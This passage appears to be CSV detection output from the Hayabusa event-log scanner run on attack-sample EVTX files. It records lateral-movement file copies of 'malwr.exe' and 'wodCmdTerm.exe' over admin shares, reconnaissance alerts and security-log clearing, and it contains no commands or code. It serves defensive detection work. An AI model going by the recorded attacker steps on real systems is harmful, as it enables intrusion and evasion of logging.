Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55585 : LogonID: 0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49244 : LogonID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:43.570 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55872 : LogonID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49222 : LogonID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: user01 : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55873 : LogonID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: WIN-77LTAPHIQ1R$ : Share Name: \\*\SYSVOL : Share Path: \??\C:\Windows\SYSVOL\sysvol : IP Address: fe80::79bf:8ee2:433c:2567,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: NULL : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 